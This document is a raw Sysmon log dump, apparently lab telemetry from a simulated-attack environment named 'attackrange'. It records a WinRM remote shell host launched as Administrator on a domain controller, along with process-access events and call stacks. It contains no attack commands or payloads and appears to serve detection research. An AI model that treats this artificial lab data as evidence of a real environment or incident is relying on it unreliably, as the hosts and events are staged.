10341000x800000000000000066Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.746{266CAFBE-62DD-6064-1400-00000000AD01}13401036C:\Windows\system32\svchost.exe{266CAFBE-6439-6064-C502-00000000AD01}4544C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x800000000000000065Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:53.715{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6439-6064-C502-00000000AD01}4544C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000064Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.699{266CAFBE-6439-6064-C602-00000000AD01}49122544C:\Windows\system32\conhost.exe{266CAFBE-6439-6064-C502-00000000AD01}4544C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000063Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.637{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-6439-6064-C602-00000000AD01}4912C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000062Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:53.637{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000061Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.637{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000060Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:53.637{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000059Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.637{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000058Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:53.637{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000057Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.637{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000056Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:53.637{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000055Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.637{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000054Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:53.637{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000053Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.637{266CAFBE-62C8-6064-0500-00000000AD01}6201152C:\Windows\system32\csrss.exe{266CAFBE-6439-6064-C502-00000000AD01}4544C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000052Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:53.637{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6439-6064-C502-00000000AD01}4544C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000051Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.638{266CAFBE-6439-6064-C502-00000000AD01}4544C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-6439-6064-4FB3-100000000000}0x10b34f0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{266CAFBE-62DD-6064-0C00-00000000AD01}8C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000050Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:53.621{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000049Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:53.621{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000048Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.621{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x800000000000000047Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.434{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000046Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:53.434{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000045Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.434{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x800000000000000044Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.402{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000043Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:53.402{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000042Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.402{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
